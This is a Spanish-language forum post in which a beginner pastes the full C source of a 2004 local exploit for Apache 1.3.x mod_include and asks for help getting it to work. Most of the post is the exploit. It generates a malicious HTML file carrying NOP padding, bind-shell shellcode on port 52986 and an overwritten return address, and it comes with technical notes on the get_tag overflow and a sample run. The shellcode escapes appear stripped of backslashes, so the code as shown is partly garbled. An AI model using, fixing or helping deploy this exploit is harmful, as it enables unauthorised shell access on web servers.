explotar vulnerabilidad con exploit en .c

editado febrero 2012 en Principiantes
Este es el codigo fuente:
	/*********************************************************************************
	 local exploit for mod_include of apache 1.3.x                                   *
	 written by xCrZx                         /18.10.2004/                           *
	 bug found by xCrZx                       /18.10.2004/                           *
	                                                                                 *
	 y0das old shao lin techniq ownz u :) remember my words                          *
	 http://lbyte.ru/16-masta_killa-16-mastakilla-mad.mp3                            *
	                                                                                 *
	 Successfully tested on apache 1.3.31 under Linux RH9.0(Shrike)                  *
	*********************************************************************************/
	
	/*********************************************************************************
	 Technical Details:                                                              *
	                                                                                 *
	 there is an overflow in get_tag function:                                       *
	                                                                                 *
	static char *get_tag(pool *p, FILE *in, char *tag, int tagbuf_len, int dodecode) *
	{                                                                                *
	...                                                                              *
	    term = c;                                                                    *
	    while (1) {                                                                  *
	        GET_CHAR(in, c, NULL, p);                                                *
	[1]        if (t - tag == tagbuf_len) {                                          *
	            *t = '';                                                           *
	            return NULL;                                                         *
	        }                                                                        *
	// Want to accept " as a valid character within a string. //                    *
	        if (c == '') {                                                         *
	[2]            *(t++) = c;         // Add backslash //                           *
	            GET_CHAR(in, c, NULL, p);                                            *
	            if (c == term) {    // Only if //                                    *
	[3]                *(--t) = c;     // Replace backslash ONLY for terminator //   *
	            }                                                                    *
	        }                                                                        *
	        else if (c == term) {                                                    *
	            break;                                                               *
	        }                                                                        *
	[4]        *(t++) = c;                                                           *
	    }                                                                            *
	    *t = '';                                                                   *
	...                                                                              *
	                                                                                 *
	as we can see there is a [1] check to determine the end of tag buffer            *
	but this check can be skiped when [2] & [4] conditions will be occured           *
	at the same time without [3] condition.                                          *
	                                                                                 *
	So attacker can create malicious file to overflow static buffer, on              *
	which tag points out and execute arbitrary code with privilegies of              *
	httpd child process.                                                             *
	                                                                                 *
	Fix:                                                                             *
	[1*]        if (t - tag >= tagbuf_len-1) {                                       *
	                                                                                 *
	Notes: To activate mod_include you need write "XBitHack on" in httpd.conf        *
	                                                                                 *
	*********************************************************************************/
	
	/*********************************************************************************
	  Example of work:                                                               *
	                                                                                 *
	  [[email protected] htdocs]# make 85mod_include                                    *
	  cc     85mod_include.c   -o 85mod_include                                      *
	  [[email protected] htdocs]# ./85mod_include 0xbfff8196 > evil.html                *
	  [[email protected] htdocs]# chmod +x evil.html                                    *
	  [[email protected] htdocs]# netstat -na|grep 52986                                *
	  [[email protected] htdocs]# telnet localhost 8080                                 *
	  Trying 127.0.0.1...                                                            *
	  Connected to localhost.                                                        *
	  Escape character is '^]'.                                                      *
	  GET /evil.html HTTP/1.0                                                        *
	  ^]                                                                             *
	  telnet> q                                                                      *
	  Connection closed.                                                             *
	  [[email protected] htdocs]# netstat -na|grep 52986                                *
	  tcp        0      0 0.0.0.0:52986           0.0.0.0:*               LISTEN     *
	  [[email protected] htdocs]#                                                       *
	*********************************************************************************/
	
	/*********************************************************************************
	  Notes: ha1fsatan - ti 4elovek-kakashka :))) be co0l as always                  *
	*********************************************************************************/
	
	/*********************************************************************************
	  Personal hello to my parents :)                                                *
	*********************************************************************************/
	
	/*********************************************************************************
	 Public shoutz to: m00 security, ech0 :), LByte, 0xbadc0ded and otherz           *
	*********************************************************************************/
	
	
	#include <stdio.h>
	#include <stdlib.h>
	#include <fcntl.h>
	
	#define EVILBUF 8202
	#define HTMLTEXT 1000
	
	#define HTML_FORMAT "<html>n<!--#echo done="%s" -->nxCrZx 0wn Un</html>"
	
	#define AUTHOR "n*** local exploit for mod_include of apache 1.3.x by xCrZx /18.10.2004/ ***n"
	
	
	int main(int argc, char **argv) {
	
	    char html[EVILBUF+HTMLTEXT];
	    char evilbuf[EVILBUF+1];
	
	    //can be changed
	    char shellcode[] =
	
	    // bind shell on 52986 port
	    "x31xc0"
	    "x31xdbx53x43x53x89xd8x40x50x89xe1xb0x66xcdx80x43"
	    "x66xc7x44x24x02xcexfaxd1x6cx24x04x6ax10x51x50x89"
	    "xe1xb0x66xcdx80x43x43xb0x66xcdx80x43x89x61x08xb0"
	    "x66xcdx80x93x31xc9xb1x03x49xb0x3fxcdx80x75xf9x68"
	    "x2fx73x68x20x68x2fx62x69x6ex88x4cx24x07x89xe3x51"
	    "x53x89xe1x31xd2xb0x0bxcdx80";
	
	    //execve /tmp/sh <- your own program
	   /*
	    "x31xc0x31xdbxb0x17xcdx80"
	    "xb0x2excdx80xebx15x5bx31"
	    "xc0x88x43x07x89x5bx08x89"
	    "x43x0cx8dx4bx08x31xd2xb0"
	    "x0bxcdx80xe8xe6xffxffxff"
	    "/tmp/sh";
	   */
	
	
	    char NOP[] = "x90x40";             // special nops ;)
	    char evilpad[] = "CRZCRZCRZCRZC";  // trick ;)
	
	    int padding,xpad=0;
	    int i,fd;
	    long ret=0xbfff8688;
	
	    if(argc>1) ret=strtoul(argv[1],0,16);
	    else { fprintf(stderr,AUTHOR"nUsage: %s <RET ADDR> > file.htmlnn",argv[0]);exit(0); }
	
	    padding=(EVILBUF-1-strlen(shellcode)-4-strlen(evilpad)+2);
	
	    while(1) {
	        if(padding%2==0) { padding/=2; break;}
	        else {padding--;xpad++;}
	    }
	
	    memset(html,0x0,sizeof html);
	    memset(evilbuf,0x0,sizeof evilbuf);
	
	    for(i=0;i<padding;i++)
	        memcpy(evilbuf+strlen(evilbuf),&NOP,2);
	    for(i=0;i<xpad;i++)
	        memcpy(evilbuf+strlen(evilbuf),(evilbuf[strlen(evilbuf)-1]==NOP[1])?(&NOP[0]):(&NOP[1]),1);
	
	
	    memcpy(evilbuf+strlen(evilbuf),&shellcode,sizeof shellcode);
	    memcpy(evilbuf+strlen(evilbuf),&evilpad,sizeof evilpad);
	    *(long*)&evilbuf[strlen(evilbuf)]=ret;
	
	    sprintf(html,HTML_FORMAT,evilbuf);
	
	    printf("%s",html);
	
	    return 0;
	}
	

Ya lo he compilado pero nose como hacerlo funcionar

Ayuda porfavor

Comentarios

Accede o Regístrate para comentar.